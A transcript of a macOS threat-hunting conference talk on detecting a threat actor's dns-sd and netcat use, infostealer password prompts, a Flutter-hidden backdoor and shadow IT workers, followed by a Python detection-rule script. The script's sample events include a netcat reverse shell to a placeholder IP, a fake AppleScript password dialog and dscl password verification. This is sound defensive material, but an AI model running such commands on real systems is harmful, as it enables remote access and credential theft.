#OBTS v8.0: "Gotta Catch 'em All" - Jaron Bradley
By Objective-See Foundation
Summary
Topics Covered
- DNS-SD Scans Broadcast SSH Hosts
- Netcat -e Flags Linux Mistakes
- OSAScript Prompts Steal Passwords
- Flutter Dylib Hides Malware
- Shadow IT Workers Use AstrillVPN
Full Transcript
So that being said, let's move over to one of the more Mac-heavy commands that I've seen the Panda run in intrusions, which is the dns-sd command. I talked a bit about this in my training as well. This basically looks for Bonjour services on the network. Your Mac has Bonjour installed by default, and most of your printers probably have it installed by default. Bonjour is a service that is basically broadcasting to the network: this is who I am, this is what I do, anybody need some help with anything? That's how you can go to a friend's house and use their printer without having done any prior setup, right? It is quite useful. In the case of Bonjour, though, the way the attacker was using it, essentially they were using it to ask the network if anybody else is broadcasting the fact that they're using SSH. Any Mac that has SSH enabled will instantly respond and say, "Yeah, I'm open over here." Right? It's a way to scan the network without actually scanning the network, because every computer with SSH is already telling the network that it's broadcasting it. So seeing them use that for lateral movement is a rather cool technique; I'm not seeing a lot of usage around this command in general. So it makes it, once again, what we're aiming for in this talk: a high-fidelity, low-false-positive sort of thing you can look for to detect this activity.
Now, the last thing I want to note for the Panda is attacker mistakes. This is kind of a hunting theory that I came up with a long time ago, and it works really well, honestly, and this feeds into the whole touching on attacker mistakes. For example, if the attacker believes they're on a Linux system running netcat and uses the -e argument to run a shell over that network connection, that's not going to work on macOS, right? But I once saw this threat actor get on a system and try more than just a few attempts to use that -e switch before realizing, oh, the BSD netcat listener does not have the -e switch. So no legitimate software is going to be running this. You might be surprised how many developers in your environment are running netcat to do random automated tasks, but even your developers that have set up automation will not be doing it this way, because there's no -e switch. Therefore, any time -e hits with netcat, you can assume something weird is going on. So we can detect that. Once again, going back to the exec command, a lot of what we're looking at here is just detections based on "process name equals this, weird arguments equal this," right? And that's honestly some of the detections we love the most: stuff that's really easy to write and comes back with a low false positive. So look for dns-sd, look for that Bonjour service being sort of scanned, and then look for netcat whenever there are the more standard Linux arguments included with it, so -e or --exec, somebody trying to run a shell over netcat. Ultimately, that's a number of different ways that you could catch this threat actor, and many of them are based on mistakes that the threat actor may have made.
Okay, so our next threat is that of infostealers, right? Can't really talk about the macOS threat landscape without talking about infostealers at the moment. These have been explosive over the last few years, and there are reasons. They have a wild success rate, and attackers are really good at the social engineering side, especially with some of the new stuff that AI has brought in. The idea is bad guys essentially steal your keychain, whatever secrets they can, and then they trade and sell those passwords and secrets on the black market. They share them with each other. They use them, and they can say, "Hey, anyone got access to company XYZ?" and somebody can say, "Yeah, here, I have this keychain I got however long ago." It's a huge problem right now. This is a big problem in the macOS threat landscape.

So just a couple of different, really easy detections. Some of these may even have been touched on in previous years at Objective by the Sea, but that dialogue: almost every single infostealer starts with that AppleScript dialogue. "Hey, I need your password. Please punch it in." The easiest way to get the password on macOS is just by asking for it. Users will fall for this time after time. Developers, power users, doesn't matter who you are. We've all seen this and we've all said, "I ain't got time for that," and we've all typed in our password. Don't pretend you haven't. So look for osascript, and then look inside the arguments for where you see the word "password" or the word "credentials," any field that an attacker might try to name something to get you to enter your password; just look for that inside of osascript. I've seen admin scripts do this as well. Not a big fan of that; you shouldn't really be using AppleScript to prompt your users. But you know your environment, hopefully, better than anyone else, so you base the whitelisting off of your own scripts.
Another way to catch a lot of infostealers would be by looking for AppleScript running as well, and looking for any time one of the more anti-debugging checks runs. So looking for QEMU, looking for VMware. A lot of times these AppleScripts are just big shell-outs with huge command lines. There are a lot of different strings you can look for. Find the ones that are reused by every single infostealer and base your detections on those. This is a low-false-positive easy win as well.
And then the third and final one I'll talk about is just dscl, using Open Directory from the command line to verify that the password the user entered is correct. This is done by attackers so that, basically, before they give up and stop asking for your password, they'll make sure what you typed in was correct. Right? So this is an easy win. I don't see a lot of legitimate software performing this check; I see it from a lot of infostealers. Watch for dscl running under AppleScript where the password is being verified, or you might even have good enough luck in your environment just looking for dscl running with the command line containing authonly.
So that is three different detections to identify a stealer, essentially, or many different stealers. There are quite a few other processes you could pick up on when stealers run, because again, they all tend to rely pretty heavily on the command line. So it generates a lot of opportunity for looking at commands run and finding the similarities. Now, the problem is these are so explosive that once we find an infostealer and once we sort of catch it, there's a new one the next day that changes and is obscured in a brand new way. So these just keep multiplying. So trying to find the detections across the different flavors is really important.
Okay, so let's turn our eyes back to, no surprise, the Chollima, because again, they are the most dangerous threat actor and the most active threat actor, I would say, targeting macOS. One thing we'd like to note is they are very good at social engineering. They're great at malware design and the theft of crypto. So before we get to the end, I just wanted to focus on a few more of the greater concerns that we've seen from this threat actor. And one of those to us is undoubtedly Flutter. We've seen the attacker sort of messing and testing with the Flutter framework. If you're not familiar with Flutter, it basically allows you to build applications using the Dart language, and then when you compile this app, you can compile it for multiple platforms. You can compile it for macOS, it'll also work on iOS, it'll work on Android. It's basically a way to build code and just be thrilled with the fact that you don't have to build it five different ways with five different versions. It should just run. So what we have seen from this threat actor in testing is that they've taken an open-source sort of Minesweeper application, and then inside of that taken a common backdoor that they frequently use and added it, and then kind of compiled it, and we found it sitting there on VirusTotal. What's most difficult about detecting this is the fact that the malicious code, or any code that you're building, gets loaded as a dylib. It doesn't get loaded as the main executable. The main executable just kind of builds your Flutter app, and then the dylib, called just "App" in this case, is what gets loaded and holds all the malware, and it's highly obfuscated just by nature. It's not the actor actually doing that. So this is a concern, because this is very difficult to detect and requires a bit more than just standard sort of ES events. It requires some additional activity. So that's one thing we've been seeing the threat actor do.

But it also brings me to the final scenario, or the last showdown, that I wanted to discuss, because it's an attack that's been talked about heavily over the past few years, and yet it's another one that's very difficult to defend against. If you haven't heard of the shadow IT worker program sort of going on, essentially the Chollima convinces you that you should hire them at your company, right? A lot of us have read about this; hopefully most of us have heard about this. But the problem is you end up shipping a laptop to somebody that is basically there to harm you. And if you think about a work laptop and what access it has, you know that wouldn't be too hard. So the idea: you hire someone in your company who has a stolen identity. They're pretending to be someone else. You ship them a company laptop of some type. Now, that laptop doesn't go directly to the person you hired. It actually ends up at a laptop farm. That laptop farm is probably someone being paid to operate that laptop farm. They might know they're doing something shady, but they might not ask too many questions. We've heard some different stories. Meanwhile, the threat actor can log into the various laptops and perform tasks kind of carefree, since they're technically employed by the company, right? So they do this with various remote technologies. So these are some different things: if your company doesn't use these apps, maybe do some searches to find out where these apps are located in your fleet, right? So things like GoToMeeting, LogMeIn, RustDesk, AnyDesk, any combination of these apps being installed as well. It's not always just necessarily one app being installed. Sometimes there's many. So essentially these are things to look at if you know that your company is not supporting and using them. Yes, I know we all have, you know, there are commonly sales teams where they have one of each installed, and that's fine, but maybe verify what's going on if you see many different apps like this being installed on a system.
And then finally, if you've read the Mandiant report that came out last year, which provided a lot of different tippers on this type of activity, you may have also noticed something like AstrillVPN. This is a common one used by this attacker in this particular scenario. There are companies using this; it's not to say they're not. But if your company is not paying for AstrillVPN or using AstrillVPN, pay extra close attention to any computer that has this installed, and maybe reach out. Make sure that somebody has met the individual in person. That is one way to generally, immediately find out whether this is of greater concern or not: if this is part of a scam, there will be no way to meet this person in person. They will be remote, and that's the only way that we know of that this attack has been done, where the individual is never on site and nobody at the company has met them. On top of that, you can look for duplicate workers inside of your LinkedIn company profile; that could also be a good tip to sort of hunt some of these potential leads down.

Something else that we have seen, not just AstrillVPN: we've seen attackers in this scenario, we believe, also installing Snagit. And really it doesn't have to be Snagit; it can be anything that can take a screenshot or video capture and compress it in a good format to send off to wherever they're sending it off. So those are two tools to kind of look for. And if you're using MDM, you don't even have to use security telemetry or SIEM feeds to actually pull this off. If you're using more of an MDM to manage your fleet, most of those MDMs will allow you to perform some type of search, right? And you can do that often with many different software in different combinations. So look for computers that have both AstrillVPN and Snagit installed, right? You can do these combinations and start these investigations even if you're not in a security role; if you're more in an admin role, you still have the ability to partake in that and find those interesting finds.

So again, check out the Mandiant report from 2024. It's got the best leads on this. And I'd argue security experts and admins alike can partake in this particular hunt, and that's just by pulling on a few relatively easy scenarios.
So the last thing I kind of wanted to talk about, Patrick sort of mentioned it for me. Thanks, Patrick. But I've been working for some year and a half on a book called Threat Hunting macOS. And I finally have it with me. I announced it last year that it would be coming, and it's finally here. It includes a lot of stories like the ones that I've sort of shared here. I try to include those stories, just different things that I've seen in the threat hunting world, that I also just want to share with all of you. So I'll be out there at 1:00 for the book signing. I have the number of books I was able to fly over with. I apologize for that, but I'll find a way to eventually ship it here to Europe at some point. Right now I'm only shipping to the US. If anybody would like to buy the book here at the OBTS price and lives in the US, I'm happy to ship it to you there so that we save a few extra books for those purchasing here in Europe. But that is all I have. Thank you very much. And I've gone over time, so I'm going to hop right off the stage here.
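The "process name equals this, arguments equal this" detections described in the talk, for both the Panda commands (dns-sd, netcat -e/--exec) and the infostealer tells (osascript password prompts and VM-check strings, dscl authonly under AppleScript), written out as simple rules. This is an added example, not code from the talk or from any vendor; the event shape, the allowlisted admin-script path and the sample command lines are constructed, and it assumes the Bonjour browse form `dns-sd -B _ssh._tcp`.

```python
import re
from dataclasses import dataclass

# Constructed allowlist of the org's own admin AppleScripts that legitimately
# prompt users (hypothetical path; base this on your environment's scripts).
ALLOWED_OSASCRIPT_PATHS = {"/Library/IT/reset_password.scpt"}
NETCAT_NAMES = {"nc", "netcat", "ncat"}
PROMPT_WORDS = re.compile(r"password|credential", re.I)
VM_WORDS = re.compile(r"qemu|vmware", re.I)

@dataclass
class ProcEvent:
    """Minimal process-exec record: argv plus parent basename (constructed shape)."""
    argv: list
    parent: str = ""

def match_rules(e: ProcEvent) -> list:
    """Return the names of every talk-derived rule this event triggers."""
    exe = e.argv[0].rsplit("/", 1)[-1]
    cmd = " ".join(e.argv)
    hits = []
    # Bonjour browse for _ssh._tcp: finds SSH hosts without a port scan
    if exe == "dns-sd" and "-B" in e.argv and "_ssh._tcp" in e.argv:
        hits.append("dns-sd-ssh-browse")
    # netcat -e/--exec: BSD nc on macOS lacks the switch, so this is a Linux
    # habit carried over by an attacker, not developer automation
    if exe in NETCAT_NAMES and any(a == "-e" or a.startswith("--exec") for a in e.argv[1:]):
        hits.append("netcat-exec-flag")
    if exe == "osascript":
        # AppleScript dialog asking for a password, unless it is one of our own scripts
        if PROMPT_WORDS.search(cmd) and not any(a in ALLOWED_OSASCRIPT_PATHS for a in e.argv):
            hits.append("osascript-password-prompt")
        # anti-analysis strings shelled out from AppleScript
        if VM_WORDS.search(cmd):
            hits.append("osascript-vm-check")
    # dscl verifying the typed password; strongest signal when the parent is osascript
    if exe == "dscl" and "-authonly" in e.argv:
        hits.append("dscl-authonly" + ("-under-osascript" if e.parent == "osascript" else ""))
    return hits

def scan(events) -> list:
    """Run all rules over a batch; return (rule, command line) pairs for review."""
    return [(r, " ".join(e.argv)) for e in events for r in match_rules(e)]

# Constructed sample events, not real telemetry
SAMPLE = [
    ProcEvent(["dns-sd", "-B", "_ssh._tcp"], parent="zsh"),
    ProcEvent(["nc", "-e", "/bin/sh", "192.0.2.10", "4444"], parent="bash"),
    ProcEvent(["osascript", "-e", 'display dialog "Enter your password" default answer ""'], parent="sh"),
    ProcEvent(["osascript", "/Library/IT/reset_password.scpt"], parent="jamf"),
    ProcEvent(["osascript", "-e", 'do shell script "ioreg -l | grep -i vmware"'], parent="sh"),
    ProcEvent(["dscl", ".", "-authonly", "alice", "<typed-password>"], parent="osascript"),
    ProcEvent(["ls", "-la"], parent="zsh"),
]
```

Calling `scan(SAMPLE)` returns five hits and skips the allowlisted admin script and the benign `ls`; feed it exec events from your own endpoint telemetry in the same argv-plus-parent shape.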